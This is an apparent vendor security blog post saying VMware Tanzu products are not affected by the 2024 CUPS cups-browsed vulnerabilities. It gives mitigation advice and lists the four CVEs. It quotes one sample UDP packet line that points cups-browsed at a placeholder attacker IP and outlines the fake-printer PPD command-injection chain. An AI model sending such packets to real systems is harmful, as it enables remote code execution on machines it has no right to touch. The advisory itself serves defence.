Tanzu Platform

Speed up your CVE response time with SBOMs

It’s always the firewalls kernel logging ssh printers
How VMware Tanzu handled the CUPS vulnerability

The TL;DR

Tanzu products are not affected by recently announced CUPS vulnerabilities.

Tanzu Platform, Tanzu Platform for Cloud Foundry, Tanzu Data Solution, Tanzu Spring, Tanzu Application Catalog, Bitnami applications are not impacted by recently announced CUPS server vulnerabilities. We’ve provided an overview of the situation and a quick fix if your systems might be impacted.

On September 23, 2024, security researcher Simone Margaritelli shared on his X feed that he’d been trying to work through the responsible disclosure process for a Severity 9.9 Remote Code Execution (RCE) vulnerability, for three weeks. The delay in the disclosure continued due to a lack of patch availability and CVE identifier assignments. As such Simone was compelled to share the results of his findings publicly.

At 3PM he posted a link to the open printing Code Of Conduct with a “1 hour to go” message implying he would be releasing his findings and leaving many security teams guessing among amongst themselves and on public community boards, that this may be related to the Common Unix Printing System or CUPS.

At 3:59PM Simone posted the link to his findings including detailed information about his research. As it turns out it WAS CUPS based.  Thank you for the hint Simone, because even though it ultimately did not impact our products, it did get us ready to respond and forced us to test our security response processes!

Within minutes of the first warning, the Tanzu security and R&D teams started reviewing systems and preparing to analyze the software bill of materials (SBOMs) for the various Tanzu products. We learned quickly that our products were not impacted. HOORAY!

What’s in the cup?

Simone’s research points to an issue with “cups-browsed” which is part of CUPS responsible for discovering and adding printers to the system. He found that CUPS systems with the default configuration allows adding remotely. In analyzing the code he determined five different input functions that lead to discovering race conditions leading to stack overflows.

Through all of his analysis Simone determined that it is possible to send a packet to cups-browsed containing a malicious url in the packet “0 3 http://<ATTACKER-IP>:<PORT>/printers/whatever” triggered a cups-browsed connecting to that url:

Using this he was able to create a fake ippserver printer and add it to remote CUPS systems. Once the printer was attached CUPS created a PostScript Printer Description or PPD file that contains a malicious command that is executed when the printer runs a job.

This results in a remote execution of any command through a fake printer added through an unconfigured CUPS service.

Quickly protect your systems

So how do you protect yourself? First if you are not running a print service, disable CUPS. This is especially important if you have print services on your home or office router that also connects to the internet! A quick search shows there are 91,517 CUPS systems on the internet!

If you need to run CUPS, then be sure you configure it to not allow anyone on the network to connect and add printers!

What does this mean for VMware Tanzu Customers?

Tanzu products are not impacted by recently announced CUPS vulnerabilities: Tanzu Platform, Tanzu Platform for Cloud Foundry, Tanzu Data Suite, Tanzu Spring Enterprise, Tanzu Application Catalog and Bitnami have all been validated as not having CUPS installed.

Tanzu Platform for Cloud Foundry does have libcups available in the jammy stack for buildpacks and applications that may compile against the library; but CUPS is not installed and it is not possible to run CUPS nor UDP services on Tanzu Platform for Cloud Foundry.

Tanzu Platform for Cloud Foundry customers can also use the compliance scanner to review any foundation and report that “CUPS is not installed” from the included CIS report.

Improve awareness and response time with platform-native SBOM scanning and analysis

The Tanzu security team was able to discover and analyze the SBOMs for all product and product components and quickly determined that not only was CUPS not running, it wasn’t even installed. With vulnerabilities happening so often, a platform with built-in SBOM discovery and analysis capabilities allowed us to rapidly identify and respond to CVEs accurately.  It’s why we built those capabilities, as well as automated SBOM creation, into Tanzu Platform.

Read more about how Tanzu Platform 10 boosts security and speeds innovation here! If you are an existing customer and have any questions please reach out to your account team and ask for a meeting with the Tanzu Security Team.

The vulnerabilities are listed below:

    • CVE-2024-47176 | cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker controlled URL.

    • CVE-2024-47076 | libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker controlled data to the rest of the CUPS system.

    • CVE-2024-47175 | libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker controlled data in the resulting PPD.

    • CVE-2024-47177 | cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter